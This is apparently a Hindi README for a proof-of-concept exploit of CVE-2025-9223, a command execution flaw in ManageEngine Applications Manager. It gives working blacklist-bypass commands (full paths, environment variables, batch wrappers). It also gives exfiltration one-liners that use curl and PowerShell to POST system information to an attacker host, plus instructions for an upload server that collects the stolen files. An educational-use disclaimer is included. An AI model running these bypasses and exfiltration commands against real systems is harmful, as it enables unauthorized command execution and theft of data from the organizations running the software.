
POC CVE-2025-9223
इस रिपॉजिटरी में ManageEngine Applications Manager के "Execute Program Action" फंक्शन में कमांड निष्पादन भेद्यता को प्रदर्शित करने वाली एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है।
Applications Manager खतरनाक कमांड को ब्लॉक करने के लिए एक ब्लैकलिस्ट (BlackListCommands) का उपयोग करता है, लेकिन मान्यता में गंभीर कमियाँ हैं:
| तरीका | उदाहरण |
|---|---|
| पूर्ण पथ | C:\Windows\System32\netstat.exe |
| एनवायरनमेंट वेरिएबल | %SystemRoot%\System32\netstat.exe |
| स्क्रिप्ट रैपर | echo netstat > a.bat && a.bat |
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload
स्क्रिप्ट upload_server.py एक्सफिल्ट्रेटेड फ़ाइलों को प्राप्त करने के लिए एक सरल HTTP सर्वर प्रदान करती है।
python3 upload_server.py
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
--host: बाइंड पता (डिफ़ॉल्ट: 0.0.0.0)--port: HTTP पोर्ट (डिफ़ॉल्ट: 8000)--dir: आउटपुट निर्देशिका (डिफ़ॉल्ट: वर्तमान निर्देशिका)✅ पथ ट्रैवर्सल से सुरक्षा
✅ टाइमस्टैम्प के साथ अद्वितीय फ़ाइल नाम
✅ IP और User-Agent के साथ अनुरोध लॉगिंग
✅ कंटेंट प्रकार सत्यापन
बाइपास उदाहरणों के साथ एक test_commands.txt फ़ाइल बनाएँ:
# पूर्ण पथ के साथ बाइपास
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an
# एनवायरनमेंट वेरिएबल के साथ बाइपास
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe
# स्क्रिप्ट रैपर के साथ बाइपास
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat
# डेटा बहिर्वाह के उदाहरण
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
महत्वपूर्ण: यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
❌ उन सिस्टम पर उपयोग न करें जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है
❌ किसी भी अवैध गतिविधि के लिए उपयोग न करें
✅ केवल नियंत्रित वातावरण में सुरक्षा अनुसंधान के लिए उपयोग करें
✅ परीक्षण करने से पहले उचित प्राधिकरण प्राप्त करें
लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। उपयोगकर्ता सभी जिम्मेदारी और जोखिम वहन करते हैं।
यह प्रोजेक्ट केवल अनुसंधान और शैक्षिक उद्देश्यों के लिए है। सर्वाधिकार सुरक्षित।
Johan Aybar - शैक्षिक उद्देश्यों के लिए
⚠️ याद दिलाना: इस PoC का उपयोग केवल अधिकृत परीक्षण वातावरण में किया जाना चाहिए। अनधिकृत उपयोग अवैध हो सकता है और सख्ती से प्रतिबंधित है।
| तरीका | एंडपॉइंट | विवरण |
|---|
| GET | / | हाल ही में अपलोड की गई फ़ाइलों की सूची |
| POST | /upload | फ़ाइलें अपलोड करें (multipart/form-data) |
| PUT | /upload/[filename] | फ़ाइलों की सीधी अपलोड |